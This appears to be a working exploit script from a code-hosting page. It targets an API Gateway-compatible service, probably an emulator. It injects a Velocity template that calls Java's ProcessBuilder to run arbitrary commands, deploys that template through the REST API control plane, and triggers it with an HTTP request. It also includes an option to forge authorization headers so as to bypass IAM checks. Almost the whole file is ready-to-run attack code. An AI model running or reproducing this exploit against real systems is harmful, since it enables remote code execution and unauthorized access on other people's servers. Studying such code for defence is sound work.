151 lines
6.2 KiB
Python
151 lines
6.2 KiB
Python
import argparse
|
|
import json
|
|
import sys
|
|
import time
|
|
import urllib.error
|
|
import urllib.request
|
|
|
|
|
|
def request_json(method, base_url, path, body=None, authorization=None):
|
|
data = None
|
|
headers = {"Accept": "application/json"}
|
|
if body is not None:
|
|
data = json.dumps(body).encode()
|
|
headers["Content-Type"] = "application/json"
|
|
if authorization is not None:
|
|
headers["Authorization"] = authorization
|
|
req = urllib.request.Request(base_url + path, data=data, headers=headers, method=method)
|
|
try:
|
|
with urllib.request.urlopen(req, timeout=15) as resp:
|
|
raw = resp.read().decode("utf-8", errors="replace")
|
|
status = resp.status
|
|
except urllib.error.HTTPError as exc:
|
|
raw = exc.read().decode("utf-8", errors="replace")
|
|
status = exc.code
|
|
try:
|
|
parsed = json.loads(raw) if raw else None
|
|
except json.JSONDecodeError:
|
|
parsed = None
|
|
return status, raw, parsed
|
|
|
|
|
|
def require(result, expected, action):
|
|
status, raw, parsed = result
|
|
if status != expected:
|
|
raise RuntimeError(f"{action} failed: HTTP {status}: {raw[:500]}")
|
|
if not isinstance(parsed, dict):
|
|
raise RuntimeError(f"{action} returned non-object JSON: {raw[:500]}")
|
|
return parsed
|
|
|
|
|
|
def vtl_string(value):
|
|
return value.replace("\\", "\\\\").replace("'", "\\'")
|
|
|
|
|
|
def payload(argv):
|
|
command_json = json.dumps(argv, separators=(",", ":"))
|
|
return (
|
|
"#set($pbClass=$util.getClass().forName('java.lang.ProcessBuilder'))\n"
|
|
"#set($listClass=$util.getClass().forName('java.util.List'))\n"
|
|
"#set($ctor=$pbClass.getConstructor($listClass))\n"
|
|
f"#set($cmd=$util.parseJson('{vtl_string(command_json)}'))\n"
|
|
"#set($pb=$ctor.newInstance($cmd))\n"
|
|
"#set($p=$pb.start())\n"
|
|
"#set($exit=$p.waitFor())\n"
|
|
'{"ok":true,"exit":"$exit"}'
|
|
)
|
|
|
|
|
|
def sigv4_authorization(access_key, date, region, scope, signature):
|
|
return (
|
|
f"AWS4-HMAC-SHA256 Credential={access_key}/{date}/{region}/{scope}/aws4_request, "
|
|
f"SignedHeaders=host, Signature={signature}"
|
|
)
|
|
|
|
|
|
def control_plane_authorization(args):
|
|
if args.authorization:
|
|
return args.authorization
|
|
if args.bypass_iam and not args.auth_access_key:
|
|
raise ValueError("--bypass-iam requires --auth-access-key or --authorization")
|
|
if not args.auth_access_key:
|
|
return None
|
|
scope = "iam" if args.bypass_iam else args.auth_scope
|
|
return sigv4_authorization(args.auth_access_key, args.auth_date, args.auth_region, scope, args.auth_signature)
|
|
|
|
|
|
def exploit(base_url, argv, cleanup, authorization):
|
|
stamp = str(int(time.time()))
|
|
template = payload(argv)
|
|
api = require(request_json("POST", base_url, "/restapis", {"name": f"vtl-rce-{stamp}"}, authorization), 201, "create REST API")
|
|
api_id = api["id"]
|
|
print(f"[+] REST API id: {api_id}")
|
|
resources = require(request_json("GET", base_url, f"/restapis/{api_id}/resources", authorization=authorization), 200, "list resources")
|
|
root_id = resources["item"][0]["id"]
|
|
resource = require(request_json("POST", base_url, f"/restapis/{api_id}/resources/{root_id}", {"pathPart": "rce"}, authorization), 201, "create resource")
|
|
resource_id = resource["id"]
|
|
print(f"[+] Resource id: {resource_id}")
|
|
require(request_json("PUT", base_url, f"/restapis/{api_id}/resources/{resource_id}/methods/GET", {"authorizationType": "NONE"}, authorization), 201, "create method")
|
|
require(request_json("PUT", base_url, f"/restapis/{api_id}/resources/{resource_id}/methods/GET/responses/200", {"responseParameters": {}}, authorization), 201, "create method response")
|
|
require(
|
|
request_json(
|
|
"PUT",
|
|
base_url,
|
|
f"/restapis/{api_id}/resources/{resource_id}/methods/GET/integration",
|
|
{"type": "MOCK", "requestTemplates": {"application/json": '{"statusCode": 200}'}},
|
|
authorization,
|
|
),
|
|
201,
|
|
"create integration",
|
|
)
|
|
require(
|
|
request_json(
|
|
"PUT",
|
|
base_url,
|
|
f"/restapis/{api_id}/resources/{resource_id}/methods/GET/integration/responses/200",
|
|
{"selectionPattern": "", "responseTemplates": {"application/json": template}},
|
|
authorization,
|
|
),
|
|
201,
|
|
"create integration response",
|
|
)
|
|
deployment = require(request_json("POST", base_url, f"/restapis/{api_id}/deployments", {"description": "vtl-rce"}, authorization), 201, "create deployment")
|
|
deployment_id = deployment["id"]
|
|
require(request_json("POST", base_url, f"/restapis/{api_id}/stages", {"stageName": "prod", "deploymentId": deployment_id}, authorization), 201, "create stage")
|
|
status, raw, parsed = request_json("GET", base_url, f"/execute-api/{api_id}/prod/rce")
|
|
if status != 200:
|
|
raise RuntimeError(f"trigger failed: HTTP {status}: {raw[:500]}")
|
|
print(f"[+] Trigger response: {raw.strip()}")
|
|
if cleanup:
|
|
deleted = request_json("DELETE", base_url, f"/restapis/{api_id}", authorization=authorization)
|
|
print(f"[+] Cleanup delete REST API: HTTP {deleted[0]}")
|
|
return parsed
|
|
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("--host", required=True)
|
|
parser.add_argument("--port", required=True, type=int)
|
|
parser.add_argument("--scheme", default="http", choices=("http", "https"))
|
|
parser.add_argument("--argv", nargs="+", required=True)
|
|
parser.add_argument("--no-cleanup", action="store_true")
|
|
parser.add_argument("--authorization")
|
|
parser.add_argument("--auth-access-key")
|
|
parser.add_argument("--auth-date", default="20260623")
|
|
parser.add_argument("--auth-region", default="us-east-1")
|
|
parser.add_argument("--auth-scope", default="apigateway")
|
|
parser.add_argument("--auth-signature", default="test")
|
|
parser.add_argument("--bypass-iam", action="store_true")
|
|
args = parser.parse_args()
|
|
try:
|
|
authorization = control_plane_authorization(args)
|
|
exploit(f"{args.scheme}://{args.host}:{args.port}", args.argv, not args.no_cleanup, authorization)
|
|
return 0
|
|
except Exception as exc:
|
|
print(f"[-] {exc}", file=sys.stderr)
|
|
return 1
|
|
|
|
|
|
if __name__ == "__main__":
|
|
raise SystemExit(main())
|